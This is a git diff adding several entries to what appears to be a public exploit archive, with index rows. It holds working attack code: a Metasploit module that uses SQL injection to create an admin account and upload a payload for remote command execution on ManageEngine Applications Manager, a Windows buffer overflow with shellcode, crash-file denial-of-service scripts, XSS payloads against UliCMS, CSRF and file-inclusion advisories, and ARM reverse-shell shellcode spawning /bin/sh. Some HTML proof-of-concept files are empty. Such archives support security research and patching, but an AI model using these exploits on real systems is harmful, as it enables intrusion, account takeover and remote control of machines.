diff --git a/exploits/hardware/dos/46733.py b/exploits/hardware/dos/46733.py
new file mode 100755
index 000000000..3b700a247
--- /dev/null
+++ b/exploits/hardware/dos/46733.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python
+# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
+# Date: 19/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.qnap.com
+# Version: 1.3.4.0317 and below are vulnerable
+# Software Link: https://www.qnap.com/en/utilities/essentials
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP/7/10 (version 1.3.3.0925)
+# CVE: CVE-2019-7181
+# POC
+# 1.) Generate qnap.txt
+# 2.) Copy the contents of qnap.txt to the clipboard
+# 3.) Paste the contents in any username/password field(Add or Edit VPN)
+# 4.) Click ok, program crashes.
+# This vulnerability was responsibly disclosed February 3, 2019, new version has been released.
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("qnap.txt","w")
+ print "[+] Creating %s bytes QNAP payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/multiple/dos/46735.html b/exploits/multiple/dos/46735.html
new file mode 100644
index 000000000..66a6f92d8
--- /dev/null
+++ b/exploits/multiple/dos/46735.html
@@ -0,0 +1,47 @@
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/multiple/remote/46740.rb b/exploits/multiple/remote/46740.rb
new file mode 100755
index 000000000..f1ea72b9a
--- /dev/null
+++ b/exploits/multiple/remote/46740.rb
@@ -0,0 +1,313 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "ManageEngine Applications Manager < 14.0 - Authentication Bypass / Remote Command Execution",
+ 'Description' => %q(
+ This module exploits sqli and command injection vulnerability in the ManageEngine AM 14 and prior versions.
+ It is completely different from the previous EDB-ID:46725 exploit.
+
+ Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides authentication bypass.
+ Therefore an unauthenticated user can gain the authority of "system" on the server.
+ It uploads malicious file using the "Execute Program Action(s)" feature of the app with the new admin account.
+
+ Tested: Applications Manager 14 on Linux 64-bit (PostgreSQL)
+ Applications Manager 14 on Windows 10 64-bit (MSSQL)
+ Applications Manager 14 on Windows 10 64-bit (PostgreSQL)
+ Applications Manager 13 on Windows Server 2012 R2 64-bit (MSSQL)
+ Applications Manager 12 on Windows Server 2012 R2 64-bit (PostgreSQL)
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'http://pentest.com.tr/exploits/ManageEngine-App-Manager-14-Auth-Bypass-Remote-Command-Execution.html' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 60, # countermeasure
+ 'RPORT' => 8443,
+ 'SSL' => true
+ },
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ },
+ 'Platform' => ['unix', 'win', 'linux'],
+ 'Targets' =>
+ [
+ [ 'Windows Target',
+ {
+ 'Platform' => ['win'],
+ 'Arch' => ARCH_CMD,
+ }
+ ],
+ [ 'Linux Target',
+ {
+ 'Platform' => ['unix','linux'],
+ 'Arch' => ARCH_CMD,
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic perl ruby python',
+ }
+ }
+ }
+ ]
+ ],
+ 'DisclosureDate' => '22 April 2019',
+ 'DefaultTarget' => 1))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path of ME', '/'])
+ ],self.class)
+ end
+
+ def peer
+ "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+ end
+
+ def print_status(msg='')
+ super("#{peer} - #{msg}")
+ end
+
+ def print_error(msg='')
+ super("#{peer} - #{msg}")
+ end
+
+ def print_good(msg='')
+ super("#{peer} - #{msg}")
+ end
+
+ def exec(action)
+ # operation of malicious file. The end of the adventure :(
+ send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'common', 'executeScript.do'),
+ 'cookie' => @cookie,
+ 'vars_get' => {
+ 'method' => 'testAction',
+ 'actionID' => action,
+ 'haid' => 'null'
+ }
+ )
+ end
+##
+# platform check
+##
+ def check_platform
+ # First touch to support of execute program ;)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'showTile.do'),
+ 'cookie' => @cookie,
+ 'vars_get' => {
+ 'TileName' => '.ExecProg',
+ 'haid' => 'null',
+ }
+ )
+ if res && res.code == 200 && res.body.include?('createExecProgAction')
+ # Platform can be discovered precisely using an application dir.
+ @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0] # It will be recalled later
+ if @dir =~ /:/
+ platform = Msf::Module::Platform::Windows
+ else
+ platform = Msf::Module::Platform::Unix
+ end
+ else
+ fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
+ end
+ file_up(platform, @dir)
+ end
+##
+# Creating and sending malicious files
+##
+ def file_up(platform, dir)
+ # specifying an extension by platform
+ if platform == Msf::Module::Platform::Windows
+ filex = ".bat"
+ else
+ if payload.encoded =~ /sh/
+ filex = ".sh"
+ elsif payload.encoded =~ /perl/
+ filex = ".pl"
+ elsif payload.encoded =~ /python/
+ filex = ".py"
+ elsif payload.encoded =~ /ruby/
+ filex = ".rb"
+ else
+ fail_with(Failure::Unknown, 'Payload type could not be checked!')
+ end
+ end
+
+ @fname= rand_text_alpha(9 + rand(3)) + filex
+ data = Rex::MIME::Message.new
+ data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
+ data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'data' => data.to_s,
+ 'agent' => 'Mozilla',
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'cookie' => @cookie,
+ 'uri' => normalize_uri(target_uri, "Upload.do")
+ })
+
+ if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
+ print_good("#{@fname} malicious file has been uploaded.")
+ create_exec_prog(dir, @fname) # Great. Let's send them somewhere else o_O
+ else
+ fail_with(Failure::Unknown, 'The file could not be uploaded!')
+ end
+ end
+
+ def create_exec_prog(dir, fname)
+
+ @display = rand_text_alphanumeric(7)
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'adminAction.do'),
+ 'cookie' => @cookie,
+ 'vars_post' => {
+ 'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
+ 'method' => 'createExecProgAction',
+ 'id' => 0,
+ 'displayname' => @display,
+ 'serversite' => 'local',
+ 'choosehost' => -2,
+ 'abortafter' => 5, # I think it would be enough for once. But I gave 5 O_o
+ 'command' => fname,
+ 'execProgExecDir' => dir,
+ 'cancel' => 'false'
+ }
+ )
+
+ if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
+ # Find actionID simply from body res
+ actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0]
+ print_status("Transactions completed. Attempting to get a session...")
+ exec(actionid)
+ else
+ fail_with(Failure::Unreachable, 'Connection error occurred!')
+ end
+
+ end
+##
+# Check all
+##
+ def check
+ # Instead of detecting the database type, we can guarantee the vuln by sending a separate query to both.
+ # The platform can be linux and possible remotely connected to the MSSQL database.
+ # In the same way platform can be windows and postgresql can be used.
+ # Thats why we are sending two queries. We will check the platform inside.
+ @uname = Rex::Text.rand_text_alpha_lower(6)
+ uid = rand_text_numeric(3)
+ apk = rand_text_numeric(6)
+ @pwd = rand_text_alphanumeric(8+rand(9))
+ # MSSQL injection should be prepared with ASCII characters.
+ # Map and join can be used for this.
+ @uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+ @unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+ @apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+ @adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)" # "ADMIN" CHARs - should not be random
+ # PostgreSQL injection query // no need APIKEY
+ pg_user =""
+ pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
+ pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
+ pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
+ # MSSQL injection query
+ ms_user =""
+ ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
+ ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
+ ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
+ # Send SQL queries to both types of database(PostreSQL,MSSQL) with SQLi vuln..
+ use_sqli(ms_user, pg_user)
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'applications.do'),
+ )
+ # If the user we sent with queries was created, the login will be successful with new admin user.
+ if res && res.code == 200 && res.body.include?('.loginDiv') # css control makes more sense. The application language may not be English.
+ @cookie = res.get_cookies
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'j_security_check'),
+ 'cookie' => @cookie,
+ 'vars_post' => {
+ 'clienttype' => 'html',
+ 'j_username' => @uname,
+ 'j_password' => @pwd
+ }
+ )
+
+ if res && res.code == 302 && res.body.include?('Redirecting to')
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'applications.do'),
+ 'cookie' => @cookie
+ )
+ @cookie = res.get_cookies # last cookie
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Safe
+ end
+ else
+ return Exploit::CheckCode::Safe
+ end
+
+ end
+
+ def exploit
+ unless Exploit::CheckCode::Vulnerable == check
+ fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+ end
+ print_good("Excellent! Logged in as #{@uname}")
+ print_status("Admin Username => #{@uname}")
+ print_status("Admin Password => #{@pwd}")
+ check_platform # Start the adventure
+ end
+##
+# Communication with the database
+##
+ def use_sqli(mssql, postgresql)
+ # two different post data must be sent.
+ # Because the query structures are different.
+ send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
+ 'vars_post' => {
+ 'resourceid' => mssql
+ }
+ )
+ # important to send the +/$ characters clear
+ send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
+ 'data' => "resourceid=#{postgresql}"
+ }, 25)
+
+ end
+end
+##
+# The end of the codes (o_O) // AkkuS
+##
\ No newline at end of file
diff --git a/exploits/php/webapps/46734.txt b/exploits/php/webapps/46734.txt
new file mode 100644
index 000000000..98e9740d7
--- /dev/null
+++ b/exploits/php/webapps/46734.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Contact Form Builder [CSRF → LFI]
+# Date: 2019-03-17
+# Exploit Author: Panagiotis Vagenas
+# Vendor Homepage: http://web-dorado.com/
+# Software Link: https://wordpress.org/plugins/contact-form-builder
+# Version: 1.0.67
+# Tested on: WordPress 5.1.1
+
+Description
+-----------
+
+Plugin implements the following AJAX actions:
+
+- `ContactFormMakerPreview`
+- `ContactFormmakerwdcaptcha`
+- `nopriv_ContactFormmakerwdcaptcha`
+- `CFMShortcode`
+
+All of them call the function `contact_form_maker_ajax`. This function
+dynamicaly loads a file defined in `$_GET['action']` or
+`$_POST['action']` if the former is not defined. Because of the way
+WordPress defines the AJAX action a user could define the plugin action
+in the `$_GET['action']` and AJAX action in `$_POST['action']`.
+Leveraging that and the fact that no sanitization is performed on the
+`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
+file using directory traversal thus leading to Local File Inclusion
+vulnerability.
+
+PoC
+---
+
+```html
+
+```
\ No newline at end of file
diff --git a/exploits/php/webapps/46738.html b/exploits/php/webapps/46738.html
new file mode 100644
index 000000000..31133a1de
--- /dev/null
+++ b/exploits/php/webapps/46738.html
@@ -0,0 +1,55 @@
+# Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user
+# Date: 2019-04-14
+# Exploit Author: ax8
+# Vendor Homepage: https://github.com/Li-Siyuan
+# Software Link: http://www.74cms.com/download/index.html
+# Version: v5.0.1
+# CVE : CVE-2019-11374
+
+
+
+74CMS v5.0.1 has a CSRF vulnerability to add a new admin user via the index.php?m=Admin&c=admin&a=add URI.
+
+
+
+
+
+
+
+
+
+
+
+ CSRF Proof
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/46739.html b/exploits/php/webapps/46739.html
new file mode 100644
index 000000000..b19234bae
--- /dev/null
+++ b/exploits/php/webapps/46739.html
@@ -0,0 +1,68 @@
+# Exploit Title: Msvod v10 has a CSRF vulnerability to change user information
+
+# Date: 2019-04-14
+# Exploit Author: ax8
+# Vendor Homepage: https://github.com/Li-Siyuan
+# Software Link: https://www.msvodx.com/
+# Version: v10
+# CVE : CVE-2019-11375
+
+
+
+Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI.
+
+
+
+
+
+
+
+
+
+
+
+ CSRF Proof
+
+
+
+
+
+
+
+
+
+
+
+
+
+MISC:http://www.iwantacve.cn/index.php/archives/198/
\ No newline at end of file
diff --git a/exploits/php/webapps/46741.txt b/exploits/php/webapps/46741.txt
new file mode 100644
index 000000000..ce87cd90c
--- /dev/null
+++ b/exploits/php/webapps/46741.txt
@@ -0,0 +1,43 @@
+# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
+# Google Dork: intext:"by UliCMS"
+# Exploit Author: Kağan EĞLENCE
+# Vendor Homepage: https://en.ulicms.de/
+# Version: 2019.2 , 2019.1
+# CVE : CVE-2019-11398
+
+### Vulnerability 1
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+Vulnerable File : /ulicms/admin/inc/loginform.php
+Request Type: GET
+Vulnerable Parameter : "go"
+Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+
+Result :
+
+### Vulnerability 2
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+Vulnerable File : /ulicms/admin/inc/registerform.php
+Request Type: GET
+Vulnerable Parameter : "go"
+Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1)
+
+Result :
+
+### Vulnerability 3 - Authenticated
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
+Request Type: GET
+Vulnerable Parameter : "error"
+Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
+
+### History
+=============
+2019-04-13 Issue discovered
+2019-04-13 Vendor contacted
+2019-04-13 Vendor response and hotfix
+2019-04-14 Vendor releases fixed versions
+2019-04-22 Advisory release
\ No newline at end of file
diff --git a/exploits/windows/dos/46732.py b/exploits/windows/dos/46732.py
new file mode 100755
index 000000000..906aad363
--- /dev/null
+++ b/exploits/windows/dos/46732.py
@@ -0,0 +1,28 @@
+# Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit
+# Date: 19.04.19
+# Vendor Homepage:http://www.audiotool.net/download.htm
+# Software Link: http://www.audiotool.net/download/audioconverter.exe
+# Exploit Author: Achilles
+# Tested Version: 5.30
+# Tested on: Windows 7 x64 Sp1
+
+# 1.- Run the python script, it will create a new file with the name "Evil.mp4"
+# 2.- Open AudioConverter.exe and Click Function and choose Audio Cutter
+# 3.- Load the file "Evil.mp4"
+# 4.- Click ok
+# 5.- Click Gut
+# 5.- And you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+ f=open("Evil.mp4","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/46737.py b/exploits/windows/local/46737.py
new file mode 100755
index 000000000..b72835fea
--- /dev/null
+++ b/exploits/windows/local/46737.py
@@ -0,0 +1,36 @@
+#!/usr/bin/python
+# Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla)
+# Date: 20-04-2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: http://www.labf.com/nfsaxe
+# Version: 3.7
+# Software Link : http://www.labf.com/download/nfsaxe.exe
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP SP3 ENG x86
+# CVE: TBC from Mitre
+# PoC:
+# 1.) Generate nfsaxeping.txt, copy the contents to clipboard.
+# 2.) In the application(ping.exe) paste contents of clipboard in to "Host IP" and click ok.
+# 3.) Click Start and calc pops
+#0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
+#Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes)
+
+shellcode = ("\x31\xC9"
+ "\x51"
+ "\x68\x63\x61\x6C\x63"
+ "\x54"
+ "\xB8\xC7\x93\xC2\x77"
+ "\xFF\xD0")
+
+buffer = "A" * 29 + "\x3b\x69\x5a\x77" + "\x90" * 10 + shellcode + "C" * (220-29-4-10-16)
+
+payload = buffer
+try:
+ f=open("nfsaxeping.txt","w")
+ print "[+] Creating %s bytes ping payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ac809f009..17aa7409c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6392,6 +6392,9 @@ id,file,description,date,author,type,platform,port
46722,exploits/multiple/dos/46722.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4",2019-04-17,"Google Security Research",dos,multiple,
46723,exploits/multiple/dos/46723.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID",2019-04-17,"Google Security Research",dos,multiple,
46726,exploits/multiple/dos/46726.txt,"Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)",2019-04-18,"Fakhri Zulkifli",dos,multiple,
+46732,exploits/windows/dos/46732.py,"Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC)",2019-04-22,Achilles,dos,windows,
+46733,exploits/hardware/dos/46733.py,"QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service",2019-04-22,"Dino Covotsos",dos,hardware,
+46735,exploits/multiple/dos/46735.html,"Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)",2019-04-22,"Bogdan Kurinnoy",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10429,6 +10432,7 @@ id,file,description,date,author,type,platform,port
46718,exploits/windows/local/46718.txt,"Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple,
46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,
+46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17346,6 +17350,7 @@ id,file,description,date,author,type,platform,port
46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110
46725,exploits/windows/remote/46725.rb,"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)",2019-04-18,AkkuS,remote,windows,
46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,
+46740,exploits/multiple/remote/46740.rb,"ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)",2019-04-22,AkkuS,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41166,3 +41171,7 @@ id,file,description,date,author,type,platform,port
46710,exploits/php/webapps/46710.py,"Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion",2019-04-16,"Haboob Team",webapps,php,80
46728,exploits/windows/webapps/46728.txt,"Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal",2019-04-19,"Vahagn Vardanyan",webapps,windows,
46729,exploits/windows/webapps/46729.txt,"Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection",2019-04-19,"Vahagn Vardanyan",webapps,windows,
+46734,exploits/php/webapps/46734.txt,"WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion",2019-04-22,"Panagiotis Vagenas",webapps,php,80
+46738,exploits/php/webapps/46738.html,"74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)",2019-04-22,ax8,webapps,php,80
+46739,exploits/php/webapps/46739.html,"Msvod 10 - Cross-Site Request Forgery (Change User Information)",2019-04-22,ax8,webapps,php,80
+46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 50c4f5635..a03003442 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -957,3 +957,4 @@ id,file,description,date,author,type,platform
46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to Passwd File Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86
46696,shellcodes/generator/46696.py,"Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)",2019-04-15,"Petr Javorik",shellcode,generator
46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86
+46736,shellcodes/arm/46736.txt,"Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm
diff --git a/shellcodes/arm/46736.txt b/shellcodes/arm/46736.txt
new file mode 100644
index 000000000..02843cc85
--- /dev/null
+++ b/shellcodes/arm/46736.txt
@@ -0,0 +1,100 @@
+/*
+* Title: Linux/ARM - Password-Protected Reverse TCP Shell
+* Date: 2019-04-20
+* Tested: armv6 (32-bit Raspberry Pi I)
+* Author: Alan Vivona - @syscall59 - medium.syscall59.com
+* Size: 100 bytes
+* No null bytes / Null-free
+*/
+
+.section .text
+.global _start
+_start:
+
+.arm
+ add r3, pc, #1 // switch to thumb mode
+ bx r3
+
+.thumb
+
+// [281] socket(2, 1, 0)
+ mov r0, #2
+ mov r1, #1
+ eor r2, r2
+ mov r7, #200
+ add r7, #81
+ svc #1
+mov r10, r0 // save sockfd into r10
+
+// [283] connect(socketfd, target, addrlen)
+ // socket fd is in r0 already
+ adr r1, target
+ strb r2, [r1, #1] // replace the 0xff value of the protocol field with a 0x00
+ strb r2, [r1, #5] // replace the 1st '255' values of the IP field with a 0
+ strb r2, [r1, #6] // replace the 2nd '255' values of the IP field with a 0
+ mov r2, #16
+ add r7, #2 // 281 + 2 = 283
+ svc #1
+
+// [003] read(sourcefd, destbuffer, amount)
+ push {r1}
+ mov r1, sp
+ mov r2, #4
+ mov r7, #3
+ read_pass:
+ mov r0, r10
+ svc #1
+ check_pass:
+ ldr r3, pass
+ ldr r4, [r1]
+ eor r3, r3, r4
+ bne read_pass
+
+// [063] dup2(sockfd, stdIO)
+ mov r1, #2 // r1 = 2 (stderr)
+ mov r7, #63 // r7 = 63 (dup2)
+ loop_stdio:
+ mov r0, r10 // r0 = saved sockfd
+ svc #1
+ sub r1,#1
+ bpl loop_stdio // loop while r3 >= 0
+
+// [011] execve(command, 0, 0)
+ adr r0, command
+ eor r2, r2
+ eor r1, r1
+ strb r2, [r0, #7]
+ mov r7, #11
+ svc #1
+
+// 2 bytes aligment fix if needed needed (can't use a nop as it has a null byte)
+// align_bytes : .byte 0xff, 0xff
+
+target:
+ // The 0xff will be replaced with a null on runtime
+ .ascii "\x02\xff" // Protocol: IPv4/TCP.
+
+ .ascii "\x11\x5c" // Port : 4444
+
+ // The '255' will be replaced with a 0 on runtime
+ .byte 127,255,255,1 // IP: 127.0.0.1.
+
+command: .ascii "/bin/sh?" // The '?' will be replaced with a null on runtime
+
+pass: .ascii "S59!"
+
+
+/*
+ Compile, link & extract:
+
+ as ARM-reverse-shell.s -o ARM-reverse-shell.o
+ ld -N ARM-reverse-shell.o -o ARM-reverse-shell
+ objcopy -O binary ARM-reverse-shell ARM-reverse-shell.dump
+ hexdump -v -e '"\\""x" 1/1 "%02x" ""' ARM-reverse-shell.dump
+
+ \x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x82\x46\x0e\xa1\x4a
+ \x70\x4a\x71\x8a\x71\x10\x22\x02\x37\x01\xdf\x02\xb4\x69\x46\x04\x22\x03\x27\x50\x46\x01\xdf\x0b\x4b
+ \x0c\x68\x63\x40\xf9\xd1\x02\x21\x3f\x27\x50\x46\x01\xdf\x01\x39\xfb\xd5\x04\xa0\x52\x40\x49\x40\xc2
+ \x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\x7f\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x3f\x53\x35\x39\x21
+
+*/
\ No newline at end of file